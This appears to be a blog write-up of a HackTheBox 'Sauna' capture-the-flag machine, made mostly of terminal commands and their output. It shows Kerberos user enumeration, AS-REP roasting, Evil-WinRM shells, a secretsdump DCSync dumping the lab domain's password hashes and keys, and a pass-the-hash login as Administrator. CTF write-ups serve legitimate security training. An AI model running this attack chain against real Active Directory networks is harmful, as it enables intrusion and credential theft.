niedziela, 22 marca 2020

HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All fun is enumeration. Start by enumerating employee accounts. The website turns out to be useful.






 root@kali  /opt/kerbrute/dist   master v1.0.3  ./kerbrute_linux_amd64 userenum --dc 10.10.10.175 --domain EGOTISTICAL-BANK.local --delay 80  --safe -v -t 148 /tmp/logins


2020/03/19 20:27:25 >  [!] steven.kerb@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 >  [!] scoins@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 >  [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2020/03/19 20:27:26 >  [!] sdriver@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 >  [!] btaylor@EGOTISTICAL-BANK.LOCAL - User does not exist



  root@kali  /opt/dirsearch   master ?  smbclient -L 10.10.10.175 -U 'egotistical-bank.local\fsmith'                                               
Enter EGOTISTICAL-BANK.LOCAL\fsmith's password:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
print$          Disk      Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer   We cant print money
SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
       

Thestrokes23     ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)

python3 GetNPUsers.py -dc-ip 10.10.10.175 egotistical-bank.local/ -usersfile /tmp/logins2  -format john -outputfile /tmp/responses.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
 root@kali  /opt/impacket/examples   master  cat /tmp/responses.txt                                                                                     ✔  ⚡  4388  10:43:31
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:3dd2da95be95ab8337aca2d69e61c55c$39389c5553c64b749830594bb8b97709a7ec18ebbb53a522468167ac4919c07d9f8c64a18bee6fe5c50af7e8b9a79747c6c3aff7b897cc3466fa3d5a3a551b00ded67e01f42a7a68dc1883ac1b2e7b1289877e65c7d5642fb62a664c604e806a7969ccba7deb0228487b0c4a1e84f431174024ca98f35a39b99be5fea58ea5b23f75471deeb00f71253db6b025199c88dd1d4279aa8c7182e60ca3fa55f59645dd316ec94d49bc89fa77dc12c4cd3c8485e00bb0ef2abc60e5eacef7d31eba41a511f9cf1a94c9d67e9e1c5eb4db366258199cc2dc47f661c008e5bf58d0a5f856ce0836ea8a2eb50fb9d6781ad293714e7a91ea60805073eb6c617745b86aa9
 root@kali  /opt/impacket/examples   master                      

 root@kali  /opt/impacket/examples   master  python3 lookupsid.py -target-ip 10.10.10.175 fsmith:Thestrokes23@egotistical-bank                          ✔  ⚡  4382  10:41:10
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at egotistical-bank
[*] StringBinding ncacn_np:egotistical-bank[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2966785786-3096785034-1186376766
498: EGOTISTICALBANK\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: EGOTISTICALBANK\Administrator (SidTypeUser)
501: EGOTISTICALBANK\Guest (SidTypeUser)
502: EGOTISTICALBANK\krbtgt (SidTypeUser)
512: EGOTISTICALBANK\Domain Admins (SidTypeGroup)
513: EGOTISTICALBANK\Domain Users (SidTypeGroup)
514: EGOTISTICALBANK\Domain Guests (SidTypeGroup)
515: EGOTISTICALBANK\Domain Computers (SidTypeGroup)
516: EGOTISTICALBANK\Domain Controllers (SidTypeGroup)
517: EGOTISTICALBANK\Cert Publishers (SidTypeAlias)
518: EGOTISTICALBANK\Schema Admins (SidTypeGroup)
519: EGOTISTICALBANK\Enterprise Admins (SidTypeGroup)
520: EGOTISTICALBANK\Group Policy Creator Owners (SidTypeGroup)
521: EGOTISTICALBANK\Read-only Domain Controllers (SidTypeGroup)
522: EGOTISTICALBANK\Cloneable Domain Controllers (SidTypeGroup)
525: EGOTISTICALBANK\Protected Users (SidTypeGroup)
526: EGOTISTICALBANK\Key Admins (SidTypeGroup)
527: EGOTISTICALBANK\Enterprise Key Admins (SidTypeGroup)
553: EGOTISTICALBANK\RAS and IAS Servers (SidTypeAlias)
571: EGOTISTICALBANK\Allowed RODC Password Replication Group (SidTypeAlias)
572: EGOTISTICALBANK\Denied RODC Password Replication Group (SidTypeAlias)
1000: EGOTISTICALBANK\SAUNA$ (SidTypeUser)
1101: EGOTISTICALBANK\DnsAdmins (SidTypeAlias)
1102: EGOTISTICALBANK\DnsUpdateProxy (SidTypeGroup)
1103: EGOTISTICALBANK\HSmith (SidTypeUser)
1105: EGOTISTICALBANK\FSmith (SidTypeUser)
1108: EGOTISTICALBANK\svc_loanmgr (SidTypeUser)
 root@kali  /opt/impacket/examples   master    


 root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.10.175 --user fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> dir


    Directory: C:\Users\FSmith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/20/2020   1:07 PM                PowerSploit-master
-a----        3/20/2020   1:18 PM          53760 SauronEye.exe
-a----        3/20/2020  12:58 PM           7120 WindowsEnum.ps1


  Windows Enumeration Script v 0.1
          by absolomb
       www.sploitspren.com
------------------------------------------


*Evil-WinRM* PS C:\Users\FSmith\Documents>

  User Directories
------------------------------------------

Name
----
Administrator
FSmith
Public
svc_loanmgr
  User Autologon Registry Items
------------------------------------------

DefaultDomainName DefaultUserName                 DefaultPassword
----------------- ---------------                 ---------------
EGOTISTICALBANK   EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround!


 root@kali  /opt/evil-winrm   master v2.3  evil-winrm -i 10.10.10.175 --user svc_loanmgr -p Moneymakestheworldgoround!                                 1 ↵  ⚡  4545  13:32:41

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>


*Evil-WinRM* PS C:\Users\FSmith> gci -Recurse -Filter "user.txt" -File -ErrorAction SilentlyContinue -Path "C:\"


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt




*Evil-WinRM* PS C:\Users\svc_loanmgr\DOcuments> ./winPEAS.exe



root@kali:/opt/SharpSploit/SharpSploit# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:f0b39206c3b064d1adc35f95e8a6e70c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:2e81c7eb6af46746f2765883f2c49879aa91a107170cf2a6e0abe4f5f593c607
SAUNA$:aes128-cts-hmac-sha1-96:63f3b1af0cadca84269ec7d2ad11bfe3
SAUNA$:des-cbc-md5:104c515b86739e08


 root@kali  /opt/evil-winrm   master v2.3  evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff                    1 ↵  ⚡  4569  12:02:57

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Autor: o
Etykiety:

Brak komentarzy:

Prześlij komentarz

Proszę zostaw swój komentarz w celu dopowiedzenia tego czego ja nie wiedziałem lub wywołania ciekawej dyskusji. Wprowadziłem moderowanie komentarzy ze względu na dużą popularność bloga wśród różnych SEO botów :)

Subskrybuj: Komentarze do posta (Atom)